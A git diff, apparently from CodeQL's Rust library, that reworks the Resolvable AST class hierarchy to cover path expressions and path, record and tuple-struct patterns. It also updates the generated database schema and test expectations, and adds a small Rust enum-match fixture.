100644 --- a/rust/ql/lib/codeql/rust/elements/RecordPat.qll +++ b/rust/ql/lib/codeql/rust/elements/RecordPat.qll @@ -7,6 +7,7 @@ private import internal.RecordPatImpl import codeql.rust.elements.Pat import codeql.rust.elements.Path import codeql.rust.elements.RecordPatFieldList +import codeql.rust.elements.Resolvable /** * A record pattern. For example: diff --git a/rust/ql/lib/codeql/rust/elements/Resolvable.qll b/rust/ql/lib/codeql/rust/elements/Resolvable.qll index e3e7b772501..200809dd852 100644 --- a/rust/ql/lib/codeql/rust/elements/Resolvable.qll +++ b/rust/ql/lib/codeql/rust/elements/Resolvable.qll @@ -7,6 +7,6 @@ private import internal.ResolvableImpl import codeql.rust.elements.AstNode /** - * Either a `Path`, or a `MethodCallExpr`. + * Either a `PathExpr`, a `PathPat`, or a `MethodCallExpr`. */ final class Resolvable = Impl::Resolvable; diff --git a/rust/ql/lib/codeql/rust/elements/TupleStructPat.qll b/rust/ql/lib/codeql/rust/elements/TupleStructPat.qll index c43672509f7..5470d18d35a 100644 --- a/rust/ql/lib/codeql/rust/elements/TupleStructPat.qll +++ b/rust/ql/lib/codeql/rust/elements/TupleStructPat.qll @@ -6,6 +6,7 @@ private import internal.TupleStructPatImpl import codeql.rust.elements.Pat import codeql.rust.elements.Path +import codeql.rust.elements.Resolvable /** * A tuple struct pattern. For example: diff --git a/rust/ql/lib/codeql/rust/elements/internal/CallExprBaseImpl.qll b/rust/ql/lib/codeql/rust/elements/internal/CallExprBaseImpl.qll index d0e4049a05d..e65f02afdb7 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/CallExprBaseImpl.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/CallExprBaseImpl.qll @@ -5,6 +5,7 @@ */ private import codeql.rust.elements.internal.generated.CallExprBase +private import codeql.rust.elements.Resolvable /** * INTERNAL: This module contains the customizable definition of `CallExprBase` and should not @@ -20,7 +21,7 @@ module Impl { private Resolvable getCallResolvable(CallExprBase call) { result = call.(MethodCallExpr) or - result = call.(CallExpr).getFunction().(PathExpr).getPath() + result = call.(CallExpr).getFunction().(PathExpr) } // the following QLdoc is generated: if you need to edit it, do it in the schema file diff --git a/rust/ql/lib/codeql/rust/elements/internal/ResolvableImpl.qll b/rust/ql/lib/codeql/rust/elements/internal/ResolvableImpl.qll index fafb86d46c0..eacd777c7e2 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/ResolvableImpl.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/ResolvableImpl.qll @@ -15,7 +15,7 @@ module Impl { // the following QLdoc is generated: if you need to edit it, do it in the schema file /** - * Either a `Path`, or a `MethodCallExpr`. + * Either a `PathExpr`, a `PathPat`, or a `MethodCallExpr`. */ class Resolvable extends Generated::Resolvable { /** diff --git a/rust/ql/lib/codeql/rust/elements/internal/TupleStructPatImpl.qll b/rust/ql/lib/codeql/rust/elements/internal/TupleStructPatImpl.qll index 1f92ed5a190..29ec980c2eb 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/TupleStructPatImpl.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/TupleStructPatImpl.qll @@ -1,4 +1,3 @@ -// generated by codegen, remove this comment if you wish to edit this file /** * This module provides a hand-modifiable wrapper around the generated class `TupleStructPat`. * @@ -12,6 +11,7 @@ private import codeql.rust.elements.internal.generated.TupleStructPat * be referenced directly. */ module Impl { + // the following QLdoc is generated: if you need to edit it, do it in the schema file /** * A tuple struct pattern. For example: * ```rust @@ -22,5 +22,7 @@ module Impl { * }; * ``` */ - class TupleStructPat extends Generated::TupleStructPat { } + class TupleStructPat extends Generated::TupleStructPat { + override string toString() { result = this.getPath().toAbbreviatedString() + "(...)" } + } } diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/ParentChild.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/ParentChild.qll index 6709629e8b4..aabbb0668d8 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/ParentChild.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/ParentChild.qll @@ -670,6 +670,25 @@ private module Impl { ) } + private Element getImmediateChildOfPath(Path e, int index, string partialPredicateCall) { + exists(int b, int bAstNode, int n, int nQualifier, int nPart | + b = 0 and + bAstNode = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfAstNode(e, i, _)) | i) and + n = bAstNode and + nQualifier = n + 1 and + nPart = nQualifier + 1 and + ( + none() + or + result = getImmediateChildOfAstNode(e, index - b, partialPredicateCall) + or + index = n and result = e.getQualifier() and partialPredicateCall = "Qualifier()" + or + index = nQualifier and result = e.getPart() and partialPredicateCall = "Part()" + ) + ) + } + private Element getImmediateChildOfPathSegment( PathSegment e, int index, string partialPredicateCall ) { @@ -2166,52 +2185,40 @@ private module Impl { ) } - private Element getImmediateChildOfPath(Path e, int index, string partialPredicateCall) { - exists(int b, int bResolvable, int n, int nQualifier, int nPart | - b = 0 and - bResolvable = - b + 1 + max(int i | i = -1 or exists(getImmediateChildOfResolvable(e, i, _)) | i) and - n = bResolvable and - nQualifier = n + 1 and - nPart = nQualifier + 1 and - ( - none() - or - result = getImmediateChildOfResolvable(e, index - b, partialPredicateCall) - or - index = n and result = e.getQualifier() and partialPredicateCall = "Qualifier()" - or - index = nQualifier and result = e.getPart() and partialPredicateCall = "Part()" - ) - ) - } - private Element getImmediateChildOfPathExprBase( PathExprBase e, int index, string partialPredicateCall ) { - exists(int b, int bExpr, int n | + exists(int b, int bExpr, int bResolvable, int n | b = 0 and bExpr = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfExpr(e, i, _)) | i) and - n = bExpr and + bResolvable = + bExpr + 1 + max(int i | i = -1 or exists(getImmediateChildOfResolvable(e, i, _)) | i) and + n = bResolvable and ( none() or result = getImmediateChildOfExpr(e, index - b, partialPredicateCall) + or + result = getImmediateChildOfResolvable(e, index - bExpr, partialPredicateCall) ) ) } private Element getImmediateChildOfPathPat(PathPat e, int index, string partialPredicateCall) { - exists(int b, int bPat, int n, int nPath | + exists(int b, int bPat, int bResolvable, int n, int nPath | b = 0 and bPat = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfPat(e, i, _)) | i) and - n = bPat and + bResolvable = + bPat + 1 + max(int i | i = -1 or exists(getImmediateChildOfResolvable(e, i, _)) | i) and + n = bResolvable and nPath = n + 1 and ( none() or result = getImmediateChildOfPat(e, index - b, partialPredicateCall) or + result = getImmediateChildOfResolvable(e, index - bPat, partialPredicateCall) + or index = n and result = e.getPath() and partialPredicateCall = "Path()" ) ) @@ -2312,10 +2319,12 @@ private module Impl { } private Element getImmediateChildOfRecordExpr(RecordExpr e, int index, string partialPredicateCall) { - exists(int b, int bExpr, int n, int nPath, int nRecordExprFieldList | + exists(int b, int bExpr, int bResolvable, int n, int nPath, int nRecordExprFieldList | b = 0 and bExpr = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfExpr(e, i, _)) | i) and - n = bExpr and + bResolvable = + bExpr + 1 + max(int i | i = -1 or exists(getImmediateChildOfResolvable(e, i, _)) | i) and + n = bResolvable and nPath = n + 1 and nRecordExprFieldList = nPath + 1 and ( @@ -2323,6 +2332,8 @@ private module Impl { or result = getImmediateChildOfExpr(e, index - b, partialPredicateCall) or + result = getImmediateChildOfResolvable(e, index - bExpr, partialPredicateCall) + or index = n and result = e.getPath() and partialPredicateCall = "Path()" or index = nPath and @@ -2352,10 +2363,12 @@ private module Impl { } private Element getImmediateChildOfRecordPat(RecordPat e, int index, string partialPredicateCall) { - exists(int b, int bPat, int n, int nPath, int nRecordPatFieldList | + exists(int b, int bPat, int bResolvable, int n, int nPath, int nRecordPatFieldList | b = 0 and bPat = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfPat(e, i, _)) | i) and - n = bPat and + bResolvable = + bPat + 1 + max(int i | i = -1 or exists(getImmediateChildOfResolvable(e, i, _)) | i) and + n = bResolvable and nPath = n + 1 and nRecordPatFieldList = nPath + 1 and ( @@ -2363,6 +2376,8 @@ private module Impl { or result = getImmediateChildOfPat(e, index - b, partialPredicateCall) or + result = getImmediateChildOfResolvable(e, index - bPat, partialPredicateCall) + or index = n and result = e.getPath() and partialPredicateCall = "Path()" or index = nPath and @@ -2596,10 +2611,12 @@ private module Impl { private Element getImmediateChildOfTupleStructPat( TupleStructPat e, int index, string partialPredicateCall ) { - exists(int b, int bPat, int n, int nField, int nPath | + exists(int b, int bPat, int bResolvable, int n, int nField, int nPath | b = 0 and bPat = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfPat(e, i, _)) | i) and - n = bPat and + bResolvable = + bPat + 1 + max(int i | i = -1 or exists(getImmediateChildOfResolvable(e, i, _)) | i) and + n = bResolvable and nField = n + 1 + max(int i | i = -1 or exists(e.getField(i)) | i) and nPath = nField + 1 and ( @@ -2607,6 +2624,8 @@ private module Impl { or result = getImmediateChildOfPat(e, index - b, partialPredicateCall) or + result = getImmediateChildOfResolvable(e, index - bPat, partialPredicateCall) + or result = e.getField(index - n) and partialPredicateCall = "Field(" + (index - n).toString() + ")" or @@ -3652,6 +3671,8 @@ private module Impl { or result = getImmediateChildOfParamList(e, index, partialAccessor) or + result = getImmediateChildOfPath(e, index, partialAccessor) + or result = getImmediateChildOfPathSegment(e, index, partialAccessor) or result = getImmediateChildOfRecordExprField(e, index, partialAccessor) @@ -3782,8 +3803,6 @@ private module Impl { or result = getImmediateChildOfParenType(e, index, partialAccessor) or - result = getImmediateChildOfPath(e, index, partialAccessor) - or result = getImmediateChildOfPathPat(e, index, partialAccessor) or result = getImmediateChildOfPathType(e, index, partialAccessor) diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/Path.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/Path.qll index 36313ca9fe9..b9a6edce9f4 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/Path.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/Path.qll @@ -6,9 +6,9 @@ private import codeql.rust.elements.internal.generated.Synth private import codeql.rust.elements.internal.generated.Raw +import codeql.rust.elements.internal.AstNodeImpl::Impl as AstNodeImpl import codeql.rust.elements.Path import codeql.rust.elements.PathSegment -import codeql.rust.elements.internal.ResolvableImpl::Impl as ResolvableImpl /** * INTERNAL: This module contains the fully generated definition of `Path` and should not @@ -24,7 +24,7 @@ module Generated { * INTERNAL: Do not reference the `Generated::Path` class directly. * Use the subclass `Path`, where the following predicates are available. */ - class Path extends Synth::TPath, ResolvableImpl::Resolvable { + class Path extends Synth::TPath, AstNodeImpl::AstNode { override string getAPrimaryQlClass() { result = "Path" } /** diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/PathExprBase.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/PathExprBase.qll index cf924962dbe..2efc1fd3dae 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/PathExprBase.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/PathExprBase.qll @@ -7,6 +7,7 @@ private import codeql.rust.elements.internal.generated.Synth private import codeql.rust.elements.internal.generated.Raw import codeql.rust.elements.internal.ExprImpl::Impl as ExprImpl +import codeql.rust.elements.internal.ResolvableImpl::Impl as ResolvableImpl /** * INTERNAL: This module contains the fully generated definition of `PathExprBase` and should not @@ -18,5 +19,5 @@ module Generated { * INTERNAL: Do not reference the `Generated::PathExprBase` class directly. * Use the subclass `PathExprBase`, where the following predicates are available. */ - class PathExprBase extends Synth::TPathExprBase, ExprImpl::Expr { } + class PathExprBase extends Synth::TPathExprBase, ExprImpl::Expr, ResolvableImpl::Resolvable { } } diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/PathPat.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/PathPat.qll index f91949de40e..e37e1e154db 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/PathPat.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/PathPat.qll @@ -8,6 +8,7 @@ private import codeql.rust.elements.internal.generated.Synth private import codeql.rust.elements.internal.generated.Raw import codeql.rust.elements.internal.PatImpl::Impl as PatImpl import codeql.rust.elements.Path +import codeql.rust.elements.internal.ResolvableImpl::Impl as ResolvableImpl /** * INTERNAL: This module contains the fully generated definition of `PathPat` and should not @@ -25,7 +26,7 @@ module Generated { * INTERNAL: Do not reference the `Generated::PathPat` class directly. * Use the subclass `PathPat`, where the following predicates are available. */ - class PathPat extends Synth::TPathPat, PatImpl::Pat { + class PathPat extends Synth::TPathPat, PatImpl::Pat, ResolvableImpl::Resolvable { override string getAPrimaryQlClass() { result = "PathPat" } /** diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll index 1c85daa22cf..368be81ad06 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll @@ -590,6 +590,28 @@ module Raw { */ class Pat extends @pat, AstNode { } + /** + * INTERNAL: Do not use. + * A path. For example: + * ```rust + * use some_crate::some_module::some_item; + * foo::bar; + * ``` + */ + class Path extends @path, AstNode { + override string toString() { result = "Path" } + + /** + * Gets the qualifier of this path, if it exists. + */ + Path getQualifier() { path_qualifiers(this, result) } + + /** + * Gets the part of this path, if it exists. + */ + PathSegment getPart() { path_parts(this, result) } + } + /** * INTERNAL: Do not use. * A path segment, which is one part of a whole path. @@ -781,7 +803,7 @@ module Raw { /** * INTERNAL: Do not use. - * Either a `Path`, or a `MethodCallExpr`. + * Either a `PathExpr`, a `PathPat`, or a `MethodCallExpr`. */ class Resolvable extends @resolvable, AstNode { /** @@ -2278,33 +2300,11 @@ module Raw { TypeRef getTy() { paren_type_ties(this, result) } } - /** - * INTERNAL: Do not use. - * A path. For example: - * ```rust - * use some_crate::some_module::some_item; - * foo::bar; - * ``` - */ - class Path extends @path, Resolvable { - override string toString() { result = "Path" } - - /** - * Gets the qualifier of this path, if it exists. - */ - Path getQualifier() { path_qualifiers(this, result) } - - /** - * Gets the part of this path, if it exists. - */ - PathSegment getPart() { path_parts(this, result) } - } - /** * INTERNAL: Do not use. * A path expression or a variable access in a formatting template. See `PathExpr` and `FormatTemplateVariableAccess` for further details. */ - class PathExprBase extends @path_expr_base, Expr { } + class PathExprBase extends @path_expr_base, Expr, Resolvable { } /** * INTERNAL: Do not use. @@ -2316,7 +2316,7 @@ module Raw { * } * ``` */ - class PathPat extends @path_pat, Pat { + class PathPat extends @path_pat, Pat, Resolvable { override string toString() { result = "PathPat" } /** @@ -2472,7 +2472,7 @@ module Raw { * Foo { .. } = second; * ``` */ - class RecordExpr extends @record_expr, Expr { + class RecordExpr extends @record_expr, Expr, Resolvable { override string toString() { result = "RecordExpr" } /** @@ -2514,7 +2514,7 @@ module Raw { * } * ``` */ - class RecordPat extends @record_pat, Pat { + class RecordPat extends @record_pat, Pat, Resolvable { override string toString() { result = "RecordPat" } /** @@ -2812,7 +2812,7 @@ module Raw { * }; * ``` */ - class TupleStructPat extends @tuple_struct_pat, Pat { + class TupleStructPat extends @tuple_struct_pat, Pat, Resolvable { override string toString() { result = "TupleStructPat" } /** diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/RecordExpr.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/RecordExpr.qll index 96fc2aa61d0..d7c6a11f21a 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/RecordExpr.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/RecordExpr.qll @@ -9,6 +9,7 @@ private import codeql.rust.elements.internal.generated.Raw import codeql.rust.elements.internal.ExprImpl::Impl as ExprImpl import codeql.rust.elements.Path import codeql.rust.elements.RecordExprFieldList +import codeql.rust.elements.internal.ResolvableImpl::Impl as ResolvableImpl /** * INTERNAL: This module contains the fully generated definition of `RecordExpr` and should not @@ -26,7 +27,7 @@ module Generated { * INTERNAL: Do not reference the `Generated::RecordExpr` class directly. * Use the subclass `RecordExpr`, where the following predicates are available. */ - class RecordExpr extends Synth::TRecordExpr, ExprImpl::Expr { + class RecordExpr extends Synth::TRecordExpr, ExprImpl::Expr, ResolvableImpl::Resolvable { override string getAPrimaryQlClass() { result = "RecordExpr" } /** diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/RecordPat.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/RecordPat.qll index b4aa66a71a0..03f2c525180 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/RecordPat.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/RecordPat.qll @@ -9,6 +9,7 @@ private import codeql.rust.elements.internal.generated.Raw import codeql.rust.elements.internal.PatImpl::Impl as PatImpl import codeql.rust.elements.Path import codeql.rust.elements.RecordPatFieldList +import codeql.rust.elements.internal.ResolvableImpl::Impl as ResolvableImpl /** * INTERNAL: This module contains the fully generated definition of `RecordPat` and should not @@ -26,7 +27,7 @@ module Generated { * INTERNAL: Do not reference the `Generated::RecordPat` class directly. * Use the subclass `RecordPat`, where the following predicates are available. */ - class RecordPat extends Synth::TRecordPat, PatImpl::Pat { + class RecordPat extends Synth::TRecordPat, PatImpl::Pat, ResolvableImpl::Resolvable { override string getAPrimaryQlClass() { result = "RecordPat" } /** diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/Resolvable.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/Resolvable.qll index 018c451e584..ecd1e7db50a 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/Resolvable.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/Resolvable.qll @@ -14,7 +14,7 @@ import codeql.rust.elements.internal.AstNodeImpl::Impl as AstNodeImpl */ module Generated { /** - * Either a `Path`, or a `MethodCallExpr`. + * Either a `PathExpr`, a `PathPat`, or a `MethodCallExpr`. * INTERNAL: Do not reference the `Generated::Resolvable` class directly. * Use the subclass `Resolvable`, where the following predicates are available. */ diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/Synth.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/Synth.qll index 0b4fa39cd84..8a236d3f322 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/Synth.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/Synth.qll @@ -630,7 +630,7 @@ module Synth { TGenericArg or TGenericArgList or TGenericParam or TGenericParamList or TItemList or TLabel or TLetElse or TLifetime or TMacroItems or TMacroStmts or TMatchArm or TMatchArmList or TMatchGuard or TMeta or TName or TNameRef or TParamBase or TParamList or - TPat or TPathSegment or TRecordExprField or TRecordExprFieldList or TRecordField or + TPat or TPath or TPathSegment or TRecordExprField or TRecordExprFieldList or TRecordField or TRecordPatField or TRecordPatFieldList or TRename or TResolvable or TRetType or TReturnTypeSyntax or TSourceFile or TStmt or TStmtList or TToken or TTokenTree or TTupleField or TTypeBound or TTypeBoundList or TTypeRef or TUseTree or TUseTreeList or @@ -721,7 +721,8 @@ module Synth { /** * INTERNAL: Do not use. */ - class TResolvable = TMethodCallExpr or TPath; + class TResolvable = + TMethodCallExpr or TPathExprBase or TPathPat or TRecordExpr or TRecordPat or TTupleStructPat; /** * INTERNAL: Do not use. @@ -1727,6 +1728,8 @@ module Synth { or result = convertPatFromRaw(e) or + result = convertPathFromRaw(e) + or result = convertPathSegmentFromRaw(e) or result = convertRecordExprFieldFromRaw(e) @@ -2067,7 +2070,15 @@ module Synth { TResolvable convertResolvableFromRaw(Raw::Element e) { result = convertMethodCallExprFromRaw(e) or - result = convertPathFromRaw(e) + result = convertPathExprBaseFromRaw(e) + or + result = convertPathPatFromRaw(e) + or + result = convertRecordExprFromRaw(e) + or + result = convertRecordPatFromRaw(e) + or + result = convertTupleStructPatFromRaw(e) } /** @@ -3111,6 +3122,8 @@ module Synth { or result = convertPatToRaw(e) or + result = convertPathToRaw(e) + or result = convertPathSegmentToRaw(e) or result = convertRecordExprFieldToRaw(e) @@ -3451,7 +3464,15 @@ module Synth { Raw::Element convertResolvableToRaw(TResolvable e) { result = convertMethodCallExprToRaw(e) or - result = convertPathToRaw(e) + result = convertPathExprBaseToRaw(e) + or + result = convertPathPatToRaw(e) + or + result = convertRecordExprToRaw(e) + or + result = convertRecordPatToRaw(e) + or + result = convertTupleStructPatToRaw(e) } /** diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/TupleStructPat.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/TupleStructPat.qll index ed4e57d8719..9e57c0a9ad8 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/TupleStructPat.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/TupleStructPat.qll @@ -9,6 +9,7 @@ private import codeql.rust.elements.internal.generated.Raw import codeql.rust.elements.Pat import codeql.rust.elements.internal.PatImpl::Impl as PatImpl import codeql.rust.elements.Path +import codeql.rust.elements.internal.ResolvableImpl::Impl as ResolvableImpl /** * INTERNAL: This module contains the fully generated definition of `TupleStructPat` and should not @@ -27,7 +28,7 @@ module Generated { * INTERNAL: Do not reference the `Generated::TupleStructPat` class directly. * Use the subclass `TupleStructPat`, where the following predicates are available. */ - class TupleStructPat extends Synth::TTupleStructPat, PatImpl::Pat { + class TupleStructPat extends Synth::TTupleStructPat, PatImpl::Pat, ResolvableImpl::Resolvable { override string getAPrimaryQlClass() { result = "TupleStructPat" } /** diff --git a/rust/ql/lib/rust.dbscheme b/rust/ql/lib/rust.dbscheme index fe0f5bc436c..d63c6d62298 100644 --- a/rust/ql/lib/rust.dbscheme +++ b/rust/ql/lib/rust.dbscheme @@ -166,6 +166,7 @@ locatable_locations( | @param_base | @param_list | @pat +| @path | @path_segment | @record_expr_field | @record_expr_field_list @@ -652,6 +653,22 @@ param_list_self_params( | @wildcard_pat ; +paths( + unique int id: @path +); + +#keyset[id] +path_qualifiers( + int id: @path ref, + int qualifier: @path ref +); + +#keyset[id] +path_parts( + int id: @path ref, + int part: @path_segment ref +); + path_segments( unique int id: @path_segment ); @@ -826,7 +843,11 @@ rename_names( @resolvable = @method_call_expr -| @path +| @path_expr_base +| @path_pat +| @record_expr +| @record_pat +| @tuple_struct_pat ; #keyset[id] @@ -1963,22 +1984,6 @@ paren_type_ties( int ty: @type_ref ref ); -paths( - unique int id: @path -); - -#keyset[id] -path_qualifiers( - int id: @path ref, - int qualifier: @path ref -); - -#keyset[id] -path_parts( - int id: @path ref, - int part: @path_segment ref -); - @path_expr_base = @path_expr ; diff --git a/rust/ql/test/extractor-tests/canonical_path/canonical_paths.expected b/rust/ql/test/extractor-tests/canonical_path/canonical_paths.expected index 0b973174828..09583dcf9f6 100644 --- a/rust/ql/test/extractor-tests/canonical_path/canonical_paths.expected +++ b/rust/ql/test/extractor-tests/canonical_path/canonical_paths.expected @@ -34,34 +34,15 @@ canonicalPaths | regular.rs:40:1:46:1 | fn enum_qualified_usage | repo::test | crate::regular::enum_qualified_usage | | regular.rs:48:1:55:1 | fn enum_unqualified_usage | repo::test | crate::regular::enum_unqualified_usage | | regular.rs:51:5:51:18 | Use | None | None | +| regular.rs:57:1:63:1 | fn enum_match | repo::test | crate::regular::enum_match | resolvedPaths -| anonymous.rs:1:5:1:9 | super | None | None | -| anonymous.rs:1:5:1:18 | ...::regular | repo::test | crate::regular | -| anonymous.rs:1:5:1:25 | ...::Trait | repo::test | crate::regular::Trait | -| anonymous.rs:10:10:10:19 | OtherTrait | repo::test | {0}::OtherTrait | -| anonymous.rs:10:25:10:35 | OtherStruct | repo::test | {0}::OtherStruct | -| anonymous.rs:14:10:14:19 | OtherTrait | repo::test | {0}::OtherTrait | -| anonymous.rs:14:25:14:29 | crate | None | None | -| anonymous.rs:14:25:14:38 | ...::regular | repo::test | crate::regular | -| anonymous.rs:14:25:14:46 | ...::Struct | repo::test | crate::regular::Struct | -| anonymous.rs:18:10:18:14 | crate | None | None | -| anonymous.rs:18:10:18:23 | ...::regular | repo::test | crate::regular | -| anonymous.rs:18:10:18:30 | ...::Trait | repo::test | crate::regular::Trait | -| anonymous.rs:18:36:18:46 | OtherStruct | repo::test | {0}::OtherStruct | -| anonymous.rs:27:17:27:27 | OtherStruct | repo::test | {0}::OtherStruct | +| anonymous.rs:27:17:27:30 | OtherStruct {...} | repo::test | {0}::OtherStruct | | anonymous.rs:28:9:28:9 | s | None | None | | anonymous.rs:28:9:28:13 | ... .f(...) | repo::test | <{0}::OtherStruct as crate::regular::Trait>::f | | anonymous.rs:29:9:29:9 | s | None | None | | anonymous.rs:29:9:29:13 | ... .g(...) | repo::test | <{0}::OtherStruct as {0}::OtherTrait>::g | | anonymous.rs:30:9:30:14 | nested | repo::test | {0}::nested | -| regular.rs:1:3:1:8 | derive | None | None | -| regular.rs:8:6:8:10 | Trait | repo::test | crate::regular::Trait | -| regular.rs:8:16:8:21 | Struct | repo::test | crate::regular::Struct | -| regular.rs:12:6:12:11 | Struct | repo::test | crate::regular::Struct | -| regular.rs:20:9:20:10 | Eq | lang:core | crate::cmp::Eq | -| regular.rs:20:13:20:32 | TraitWithBlanketImpl | repo::test | crate::regular::TraitWithBlanketImpl | -| regular.rs:20:38:20:38 | T | None | None | -| regular.rs:27:13:27:18 | Struct | repo::test | crate::regular::Struct | +| regular.rs:27:13:27:21 | Struct {...} | repo::test | crate::regular::Struct | | regular.rs:28:5:28:5 | s | None | None | | regular.rs:28:5:28:9 | ... .f(...) | repo::test | ::f | | regular.rs:29:5:29:5 | s | None | None | @@ -69,21 +50,17 @@ resolvedPaths | regular.rs:30:5:30:5 | s | None | None | | regular.rs:30:5:30:9 | ... .h(...) | repo::test | <_ as crate::regular::TraitWithBlanketImpl>::h | | regular.rs:31:5:31:8 | free | repo::test | crate::regular::free | -| regular.rs:36:14:36:18 | usize | None | None | -| regular.rs:37:19:37:23 | usize | None | None | -| regular.rs:41:9:41:14 | Option | lang:core | crate::option::Option | | regular.rs:41:9:41:26 | ...::None::<...> | lang:core | crate::option::Option::None | -| regular.rs:42:9:42:14 | Option | lang:core | crate::option::Option | | regular.rs:42:9:42:20 | ...::Some | lang:core | crate::option::Option::Some | -| regular.rs:43:9:43:14 | MyEnum | repo::test | crate::regular::MyEnum | | regular.rs:43:9:43:24 | ...::Variant1 | repo::test | crate::regular::MyEnum::Variant1 | -| regular.rs:44:9:44:14 | MyEnum | repo::test | crate::regular::MyEnum | | regular.rs:44:9:44:24 | ...::Variant2 | repo::test | crate::regular::MyEnum::Variant2 | -| regular.rs:45:9:45:14 | MyEnum | repo::test | crate::regular::MyEnum | -| regular.rs:45:9:45:24 | ...::Variant3 | repo::test | crate::regular::MyEnum::Variant3 | +| regular.rs:45:9:45:33 | ...::Variant3 {...} | repo::test | crate::regular::MyEnum::Variant3 | | regular.rs:49:9:49:18 | None::<...> | lang:core | crate::option::Option::None | | regular.rs:50:9:50:12 | Some | lang:core | crate::option::Option::Some | -| regular.rs:51:9:51:14 | MyEnum | repo::test | crate::regular::MyEnum | | regular.rs:52:9:52:16 | Variant1 | repo::test | crate::regular::MyEnum::Variant1 | | regular.rs:53:9:53:16 | Variant2 | repo::test | crate::regular::MyEnum::Variant2 | -| regular.rs:54:9:54:16 | Variant3 | repo::test | crate::regular::MyEnum::Variant3 | +| regular.rs:54:9:54:25 | Variant3 {...} | repo::test | crate::regular::MyEnum::Variant3 | +| regular.rs:58:11:58:11 | e | None | None | +| regular.rs:59:9:59:24 | ...::Variant1 | repo::test | crate::regular::MyEnum::Variant1 | +| regular.rs:60:9:60:27 | ...::Variant2(...) | repo::test | crate::regular::MyEnum::Variant2 | +| regular.rs:61:9:61:31 | ...::Variant3 {...} | repo::test | crate::regular::MyEnum::Variant3 | diff --git a/rust/ql/test/extractor-tests/canonical_path/regular.rs b/rust/ql/test/extractor-tests/canonical_path/regular.rs index ac06a12d24a..82b0525489f 100644 --- a/rust/ql/test/extractor-tests/canonical_path/regular.rs +++ b/rust/ql/test/extractor-tests/canonical_path/regular.rs @@ -53,3 +53,11 @@ fn enum_unqualified_usage() { _ = Variant2(0); _ = Variant3 { x: 1 }; } + +fn enum_match(e: MyEnum) { + match e { + MyEnum::Variant1 => {} + MyEnum::Variant2(_) => {} + MyEnum::Variant3 { .. } => {} + } +} diff --git a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.expected b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.expected index df4fdad5c91..4f9a487e85d 100644 --- a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.expected +++ b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.expected @@ -1,5 +1,5 @@ -| gen_format_args_expr.rs:9:20:9:20 | x | -| gen_format_args_expr.rs:9:25:9:25 | y | -| gen_format_argument.rs:5:22:5:26 | value | -| gen_format_argument.rs:5:29:5:33 | width | -| gen_format_argument.rs:5:36:5:44 | precision | +| gen_format_args_expr.rs:9:20:9:20 | x | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | +| gen_format_args_expr.rs:9:25:9:25 | y | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | +| gen_format_argument.rs:5:22:5:26 | value | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | +| gen_format_argument.rs:5:29:5:33 | width | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | +| gen_format_argument.rs:5:36:5:44 | precision | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | diff --git a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql index 4f43ca11870..488207bc5bb 100644 --- a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql +++ 